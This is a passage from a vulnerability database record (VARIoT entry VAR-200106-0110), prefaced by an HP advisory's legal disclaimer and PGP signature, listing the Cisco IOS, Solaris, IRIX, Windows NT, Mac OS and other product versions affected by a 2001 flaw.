(c)Copyright 2005 Hewlett-Packard Development Company, L.P. Hewlett-Packard Company shall not be liable for technical or editorial errors or omissions contained herein. The information provided is provided "as is" without warranty of any kind. To the extent permitted by law, neither HP nor its affiliates, subcontractors or suppliers will be liable for incidental, special or consequential damages including downtime cost; lost profits; damages relating to the procurement of substitute products or services; or damages for loss of data, or software restoration. The information in this document is subject to change without notice. Hewlett-Packard Company and the names of Hewlett-Packard products referenced herein are trademarks of Hewlett-Packard Company in the United States and other countries. Other product and company names mentioned herein may be trademarks of their respective owners.

-----BEGIN PGP SIGNATURE----- Version: PGP 8.1

iQA/AwUBQtuSLuAfOvwtKn1ZEQJXrwCgpDVfLyXvXZd3sF6bswgQ3DLz5jcAoNt2 As7Gf9BY697IdlYjIlmrirG1 =143G -----END PGP SIGNATURE-----

Show details on source website


{
  "@context": {
    "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
    "affected_products": {
      "@id": "https://www.variotdbs.pl/ref/affected_products"
    },
    "configurations": {
      "@id": "https://www.variotdbs.pl/ref/configurations"
    },
    "credits": {
      "@id": "https://www.variotdbs.pl/ref/credits"
    },
    "cvss": {
      "@id": "https://www.variotdbs.pl/ref/cvss/"
    },
    "description": {
      "@id": "https://www.variotdbs.pl/ref/description/"
    },
    "exploit_availability": {
      "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
    },
    "external_ids": {
      "@id": "https://www.variotdbs.pl/ref/external_ids/"
    },
    "iot": {
      "@id": "https://www.variotdbs.pl/ref/iot/"
    },
    "iot_taxonomy": {
      "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
    },
    "patch": {
      "@id": "https://www.variotdbs.pl/ref/patch/"
    },
    "problemtype_data": {
      "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
    },
    "references": {
      "@id": "https://www.variotdbs.pl/ref/references/"
    },
    "sources": {
      "@id": "https://www.variotdbs.pl/ref/sources/"
    },
    "sources_release_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
    },
    "sources_update_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
    },
    "threat_type": {
      "@id": "https://www.variotdbs.pl/ref/threat_type/"
    },
    "title": {
      "@id": "https://www.variotdbs.pl/ref/title/"
    },
    "type": {
      "@id": "https://www.variotdbs.pl/ref/type/"
    }
  },
  "@id": "https://www.variotdbs.pl/vuln/VAR-200106-0110",
  "affected_products": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.1,
        "vendor": "cisco",
        "version": "12.1"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.1,
        "vendor": "cisco",
        "version": "12.0"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.1,
        "vendor": "cisco",
        "version": "11.3"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.1,
        "vendor": "cisco",
        "version": "11.2"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.1,
        "vendor": "cisco",
        "version": "11.1"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.1,
        "vendor": "cisco",
        "version": "11.0"
      },
      {
        "model": null,
        "scope": null,
        "trust": 0.8,
        "vendor": "beckwith electric",
        "version": null
      },
      {
        "model": null,
        "scope": null,
        "trust": 0.8,
        "vendor": "freebsd",
        "version": null
      },
      {
        "model": null,
        "scope": null,
        "trust": 0.8,
        "vendor": "fujitsu",
        "version": null
      },
      {
        "model": null,
        "scope": null,
        "trust": 0.8,
        "vendor": "hewlett packard",
        "version": null
      },
      {
        "model": null,
        "scope": null,
        "trust": 0.8,
        "vendor": "openbsd",
        "version": null
      },
      {
        "model": null,
        "scope": null,
        "trust": 0.8,
        "vendor": "sgi",
        "version": null
      },
      {
        "model": null,
        "scope": null,
        "trust": 0.8,
        "vendor": "sun microsystems",
        "version": null
      },
      {
        "model": null,
        "scope": null,
        "trust": 0.8,
        "vendor": "wind river",
        "version": null
      },
      {
        "model": "solaris",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "sun microsystems",
        "version": "2.6 (sparc)"
      },
      {
        "model": "solaris",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "sun microsystems",
        "version": "2.6 (x86)"
      },
      {
        "model": "solaris",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "sun microsystems",
        "version": "7.0 (sparc)"
      },
      {
        "model": "solaris",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "sun microsystems",
        "version": "7.0 (x86)"
      },
      {
        "model": "solaris",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "sun microsystems",
        "version": "8 (sparc)"
      },
      {
        "model": "solaris",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "sun microsystems",
        "version": "8 (x86)"
      },
      {
        "model": "hp-ux",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "hewlett packard",
        "version": "11.00"
      },
      {
        "model": "hp-ux",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "hewlett packard",
        "version": "11.04"
      },
      {
        "model": "hp-ux",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "hewlett packard",
        "version": "11.11"
      },
      {
        "model": "ios 11.2 xa",
        "scope": null,
        "trust": 0.6,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "solaris",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "sun",
        "version": "7.0"
      },
      {
        "model": "irix m",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "sgi",
        "version": "6.5.14"
      },
      {
        "model": "irix f",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "sgi",
        "version": "6.5.14"
      },
      {
        "model": "irix",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "sgi",
        "version": "6.5.14"
      },
      {
        "model": "irix m",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "sgi",
        "version": "6.5.13"
      },
      {
        "model": "irix f",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "sgi",
        "version": "6.5.13"
      },
      {
        "model": "irix",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "sgi",
        "version": "6.5.13"
      },
      {
        "model": "irix m",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "sgi",
        "version": "6.5.12"
      },
      {
        "model": "irix f",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "sgi",
        "version": "6.5.12"
      },
      {
        "model": "irix",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "sgi",
        "version": "6.5.12"
      },
      {
        "model": "irix m",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "sgi",
        "version": "6.5.11"
      },
      {
        "model": "irix f",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "sgi",
        "version": "6.5.11"
      },
      {
        "model": "irix",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "sgi",
        "version": "6.5.11"
      },
      {
        "model": "irix m",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "sgi",
        "version": "6.5.10"
      },
      {
        "model": "irix f",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "sgi",
        "version": "6.5.10"
      },
      {
        "model": "irix",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "sgi",
        "version": "6.5.10"
      },
      {
        "model": "irix m",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "sgi",
        "version": "6.5.9"
      },
      {
        "model": "irix f",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "sgi",
        "version": "6.5.9"
      },
      {
        "model": "irix",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "sgi",
        "version": "6.5.9"
      },
      {
        "model": "irix m",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "sgi",
        "version": "6.5.8"
      },
      {
        "model": "irix f",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "sgi",
        "version": "6.5.8"
      },
      {
        "model": "irix",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "sgi",
        "version": "6.5.8"
      },
      {
        "model": "irix m",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "sgi",
        "version": "6.5.7"
      },
      {
        "model": "irix f",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "sgi",
        "version": "6.5.7"
      },
      {
        "model": "irix",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "sgi",
        "version": "6.5.7"
      },
      {
        "model": "irix m",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "sgi",
        "version": "6.5.6"
      },
      {
        "model": "irix f",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "sgi",
        "version": "6.5.6"
      },
      {
        "model": "irix",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "sgi",
        "version": "6.5.6"
      },
      {
        "model": "irix m",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "sgi",
        "version": "6.5.5"
      },
      {
        "model": "irix f",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "sgi",
        "version": "6.5.5"
      },
      {
        "model": "irix",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "sgi",
        "version": "6.5.5"
      },
      {
        "model": "irix m",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "sgi",
        "version": "6.5.4"
      },
      {
        "model": "irix f",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "sgi",
        "version": "6.5.4"
      },
      {
        "model": "irix",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "sgi",
        "version": "6.5.4"
      },
      {
        "model": "irix m",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "sgi",
        "version": "6.5.3"
      },
      {
        "model": "irix f",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "sgi",
        "version": "6.5.3"
      },
      {
        "model": "irix",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "sgi",
        "version": "6.5.3"
      },
      {
        "model": "irix m",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "sgi",
        "version": "6.5.2"
      },
      {
        "model": "irix f",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "sgi",
        "version": "6.5.2"
      },
      {
        "model": "irix",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "sgi",
        "version": "6.5.2"
      },
      {
        "model": "irix",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "sgi",
        "version": "6.5.1"
      },
      {
        "model": "irix",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "sgi",
        "version": "6.5"
      },
      {
        "model": "openbsd",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "openbsd",
        "version": "2.8"
      },
      {
        "model": "windows nt workstation sp6a",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "4.0"
      },
      {
        "model": "windows nt workstation sp6",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "4.0"
      },
      {
        "model": "windows nt workstation sp5",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "4.0"
      },
      {
        "model": "windows nt workstation sp4",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "4.0"
      },
      {
        "model": "windows nt workstation sp3",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "4.0"
      },
      {
        "model": "windows nt workstation sp2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "4.0"
      },
      {
        "model": "windows nt workstation sp1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "4.0"
      },
      {
        "model": "windows nt workstation",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "4.0"
      },
      {
        "model": "windows nt terminal server sp6",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "4.0"
      },
      {
        "model": "windows nt terminal server sp5",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "4.0"
      },
      {
        "model": "windows nt terminal server sp4",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "4.0"
      },
      {
        "model": "windows nt terminal server sp3",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "4.0"
      },
      {
        "model": "windows nt terminal server sp2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "4.0"
      },
      {
        "model": "windows nt terminal server sp1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "4.0"
      },
      {
        "model": "windows nt terminal server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "4.0"
      },
      {
        "model": "windows nt server sp6a",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "4.0"
      },
      {
        "model": "windows nt server sp6",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "4.0"
      },
      {
        "model": "windows nt server sp5",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "4.0"
      },
      {
        "model": "windows nt server sp4",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "4.0"
      },
      {
        "model": "windows nt server sp3",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "4.0"
      },
      {
        "model": "windows nt server sp2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "4.0"
      },
      {
        "model": "windows nt server sp1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "4.0"
      },
      {
        "model": "windows nt server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "4.0"
      },
      {
        "model": "windows nt enterprise server sp6a",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "4.0"
      },
      {
        "model": "windows nt enterprise server sp6",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "4.0"
      },
      {
        "model": "windows nt enterprise server sp5",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "4.0"
      },
      {
        "model": "windows nt enterprise server sp4",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "4.0"
      },
      {
        "model": "windows nt enterprise server sp3",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "4.0"
      },
      {
        "model": "windows nt enterprise server sp2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "4.0"
      },
      {
        "model": "windows nt enterprise server sp1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "4.0"
      },
      {
        "model": "windows nt enterprise server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "4.0"
      },
      {
        "model": "windows nt sp6",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "4.0"
      },
      {
        "model": "windows nt sp5",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "4.0"
      },
      {
        "model": "windows nt sp4",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "4.0"
      },
      {
        "model": "windows nt sp3",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "4.0"
      },
      {
        "model": "windows nt sp2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "4.0"
      },
      {
        "model": "windows nt sp1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "4.0"
      },
      {
        "model": "windows nt",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "4.0"
      },
      {
        "model": "windows 98se",
        "scope": null,
        "trust": 0.3,
        "vendor": "microsoft",
        "version": null
      },
      {
        "model": "windows",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "98"
      },
      {
        "model": "windows",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "95"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.1.x"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.0.x"
      },
      {
        "model": "aix",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.3"
      },
      {
        "model": "hp-ux",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "11.11"
      },
      {
        "model": "hp-ux",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "11.04"
      },
      {
        "model": "hp-ux",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "11.0"
      },
      {
        "model": "hp-ux",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "10.20"
      },
      {
        "model": "hp-ux",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "10.0"
      },
      {
        "model": "-stablepre050201",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "freebsd",
        "version": "4.2"
      },
      {
        "model": "-stablepre050201",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "freebsd",
        "version": "3.5"
      },
      {
        "model": "ios 12.1yd",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 12.1yc",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 12.1yb",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 12.1ya",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 12.1xz",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 12.1xy",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "12.1xx"
      },
      {
        "model": "ios 12.1xw",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "12.1xv"
      },
      {
        "model": "ios 12.1xu",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 12.1xt",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 12.1xs",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 12.1xr",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 12.1xq",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 12.1xp",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 12.1xm",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 12.1xl",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 12.1xk",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 12.1xj",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 12.1xi",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 12.1xh",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 12.1xg",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 12.1xf",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 12.1xe",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 12.1xd",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 12.1xc",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 12.1xb",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 12.1xa",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 12.1t",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 12.1ex",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 12.1ec",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 12.1e",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 12.1dc",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 12.1db",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 12.1da",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 12.1cx",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 12.1aa",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "12.0xv"
      },
      {
        "model": "ios 12.0xu",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 12.0xs",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 12.0xr",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 12.0xq",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 12.0xp",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 12.0xn",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 12.0xm",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 12.0xl",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 12.0xk",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 12.0xj",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 12.0xi",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 12.0xh",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 12.0xg",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 12.0xf",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 12.0xe",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 12.0xd",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 12.0xc",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 12.0xb",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 12.0xa",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 12.0wt",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 12.0w5",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 12.0t",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 12.0sx",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 12.0st",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 12.0sl",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 12.0sc",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 12.0s",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 12.0dc",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 12.0db",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 12.0da",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 11.3wa4",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 11.3t",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 11.3na",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 11.3ma",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 11.3ha",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 11.3db",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 11.3da",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 11.3aa",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 11.3 xa",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 11.2wa3",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 11.2sa",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 11.2p",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 11.2gs",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 11.2f",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 11.2bc",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 11.1ia",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 11.1ct",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 11.1cc",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 11.1ca",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 11.1aa",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "bsd/os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "bsdi",
        "version": "4.0"
      },
      {
        "model": "bsd/os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "bsdi",
        "version": "3.0"
      },
      {
        "model": "mac os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "x10.0.2"
      },
      {
        "model": "mac os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "x10.0.1"
      },
      {
        "model": "mac os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "x10.0"
      },
      {
        "model": "mac os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "99.1"
      },
      {
        "model": "mac os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "99.0.4"
      },
      {
        "model": "mac os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "99.0"
      },
      {
        "model": "mac os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "88.6"
      },
      {
        "model": "mac os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "88.5"
      },
      {
        "model": "mac os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "88.1"
      },
      {
        "model": "mac os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "88.0"
      },
      {
        "model": "mac os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "77.6.1"
      },
      {
        "model": "mac os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "77.6"
      },
      {
        "model": "mac os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "77.5.3"
      },
      {
        "model": "mac os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "77.5.2"
      },
      {
        "model": "mac os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "77.5.1"
      },
      {
        "model": "mac os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "77.1.2"
      },
      {
        "model": "mac os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "77.1"
      },
      {
        "model": "mac os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "77.0.1"
      },
      {
        "model": "mac os",
        "scope": "eq",
